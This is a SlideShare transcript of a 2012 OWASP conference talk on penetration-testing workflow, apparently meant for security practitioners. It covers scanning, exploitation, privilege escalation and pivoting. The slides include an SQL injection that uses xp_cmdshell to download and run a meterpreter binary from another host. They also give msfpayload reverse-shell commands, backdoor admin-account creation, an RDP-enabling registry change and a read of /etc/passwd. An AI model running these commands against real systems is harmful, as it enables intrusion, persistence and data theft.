SlideShare a Scribd company logo

Public exploit held private : Penetration Testing the researcher’s way

T
titanlambda

This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like: 0. How do I prepare? What kind of tools I should have? 1. I need to scan the entire network in a faster way? 2. How can I get more accurate results for scanning and fingerprinting? 3. Nessus says it is vulnerable but how can I exploit? 4. What if I know it is vulnerable but I don’t have any exploits available? 5. I am inside the box, compromised it, now what to do? In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.

Technology
1 of 36
OWASP InfoSec India Conference 2012 August 24th – 25th, 2012 The OWASP Foundation Hotel Crowne Plaza, Gurgaon http://www.owasp.org http://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
DISCLAIMER! This presentation contains materials on the evolution of a pen tester which is solely based on the perspective of the speaker which might contradict with opinions of individuals. All the scenarios explained here are fictional even though they might resemble to realistic situations. Even though no harm intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
Setting the context Why Pentesting? How do you do it?  To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
Setting the context  Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
Basics Pentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
Basics… Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
Scanning Why?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
Scanning Desi Jugaad  Ping sweep / shell scripts  Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
Desi Jugaad (Local Hack) Ping Sweep Windows FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
Scanning Problem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
Desi Jugaad  Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap  Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
Nmap Scripts /usr/locale/share/nmap/scripts OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 12
Nmap Scripts • Shared files and folders • nmap --script=smb-enum-shares 192.168.80.129 • Check for SMB vulnerabilities • nmap --script=smb-check-vulns 192.168.80.129 • Scan for machines that use default Ms sql username,password • nmap --script=ms-sql-info 192.168.80.129 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
Scanning I have Nessus. Why to go through so much pain? I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
Exploit  Motive  To gain access  Data  Command execution  Destroy everything!  Categories  Service level  OS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
Exploit What to exploit?  FTP?  HTTP?  SNMP?  What else? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
Exploit  FTP  Server Exploit – Buffer Overflow  Fuzzing???  Bruteforce SNMP  What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
FTP Tips Windows echo open 192.168.12.124 > ftp.txt echo ftp>> ftp.txt echo ftp>> ftp.txt echo bin >> ftp.txt echo get met2.exe >> ftp.txt echo bye >> ftp.txt ftp -s:ftp.txt OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
FTP Tips Linux echo quote user ftp>> ftp.txt quote user ftp echo quote pass ftp>>ftp.txt echo verbose>>ftp.txt echo binary >> ftp.txt echo get exploit.c >> ftp.txt echo bye >> ftp.txt cat ftp.txt|ftp -n 192.168.12.124 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
Exploit  HTTP  Server Exploit  Command Execution  Web Shells  SQLi OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
HTTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 21
SQLi Tips ' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye';exec master..xp_cmdshell 'ftp - s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';-- OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
SQLi Tips My SQL non-interactive  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "use mysql; show tables;"  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';" OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
Exploit  Metasploit  Use Exploit  Set payload  exploit  Any other options? How about writing own exploit (at free time) (out of scope) OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
L33t love story  Exploit’s love letter to the machine  PAYLOAD… Which courier?  MSF – set payload  Custom program – msfpayload  Bad characters  Executable - msfpayload OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
Payload Generator  meterpreter msfpayload options: ./msfpayload windows/meterpreter/reverse_tcp O Create exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe Generate shellcode: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
From msf: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.40 set LPORT 80 show options exploit OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
Exploit I am in, what to do?  Secure access?  Add user  Open a port  I like it the reverse way  meterpreter  Dude, did you get root/admin acces? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
Add User  Windows Shell net user hacker hacker123 /add net localgroup administrators hacker /add  Meterpreter use incognito add_user hacker hacker123 add_localgroup_user Administrators hacker  RDP enable reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
Privilege Escalation  Categories  Service level  OS Problem!  How can I transfer my exploit there?  Netcat  FTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
Kernel Exploits  Linux Kernel <= 2.6.36-rc8 http://www.exploit- db.com/exploits/15285/  Linux Kernel 2.4/2.6 http://www.exploit- db.com/exploits/9545/  Linux Kernel 2.6 http://www.exploit- db.com/exploits/8478/  Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
Windows Exploits  Windows Vista, 7, 2008 http://www.exploit- db.com/exploits/15609/  Windows XP, 2003 http://www.exploit- db.com/exploits/18176/  Linux + NT priv esc http://www.exploit- db.com/exploits/9301/  Windows XP SP2, SP3 http://www.exploit- db.com/exploits/9301/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
Pivoting…  Huh? Why do I need it? How do I do it?  nc + port forwarding  Ssh tunneling OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
Fuzzing…  My favorite but last thing I prefer to do on my own  Python rocks!  Basic  Advanced  SEH handler  Egg hunting shellcode OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
Did I miss anything?  Questions  Perspectives  Comments tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
Thank you tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu 36 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)

Recommended

Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...
owaspindia
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
CODE BLUE
 
Escape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud ServiceEscape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud Service
Robert Munteanu
 
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
David Buck
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
Jimmy Chang
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данных
Positive Hack Days
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware Analysis
Brian Baskin
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 

Recommended

Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...
owaspindia
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
CODE BLUE
 
Escape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud ServiceEscape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud Service
Robert Munteanu
 
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
David Buck
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
Jimmy Chang
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данных
Positive Hack Days
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware Analysis
Brian Baskin
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 
The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarThe magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumar
owaspindia
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
owaspindia
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
Aleksandr Tarasov
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
Dmitry Iudin
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
Jisc
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
Javan Rasokat
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
VISEO
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
kilroy440
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
Arun Michael Dsouza
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
Abhijeet Vaikar
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
Matt Ray
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity serviceopenstackindia
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
Wim Godden
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
Rosemary Wang
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
Databricks
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
Almudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
Things Lab
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
Jen Stirrup
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 

More Related Content

Similar to Public exploit held private : Penetration Testing the researcher’s way

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarThe magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumar
owaspindia
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
owaspindia
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
Aleksandr Tarasov
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
Dmitry Iudin
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
Jisc
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
Javan Rasokat
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
VISEO
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
kilroy440
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
Arun Michael Dsouza
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
Abhijeet Vaikar
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
Matt Ray
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity serviceopenstackindia
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
Wim Godden
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
Rosemary Wang
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
Databricks
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
Almudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
Things Lab
 

Similar to Public exploit held private : Penetration Testing the researcher’s way (20)

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarThe magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumar
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity service
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
 

Recently uploaded

The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
Jen Stirrup
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
Peter Spielvogel
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
UiPathCommunity
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
